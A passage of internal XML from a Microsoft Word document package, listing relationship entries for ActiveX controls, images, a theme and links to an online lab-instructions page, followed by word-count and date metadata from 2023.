Target="activeX/activeX5.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX11.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX17.xml"/><Relationship Id="rId54"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control" Target="activeX/activeX15.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX19.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX23.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX25.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control" Target="activeX/activeX8.xm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control" Target="activeX/activeX21.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labclient.labondemand.com/Instructions/52f4d542-434e-4a10-8f51-0c2b8ca1d32b?rc=10" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX12.xm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control" Target="activeX/activeX4.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX10.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX14.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX18.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labclient.labondemand.com/Instructions/52f4d542-434e-4a10-8f51-0c2b8ca1d32b?rc=10" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX1.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX22.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image" Target="media/image6.jpeg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX9.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX13.xm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image" Target="media/image26.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1116</Words>
  <Characters>6363</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>53</Lines>
  <Paragraphs>14</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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2023-07-11T16:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-11T16:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>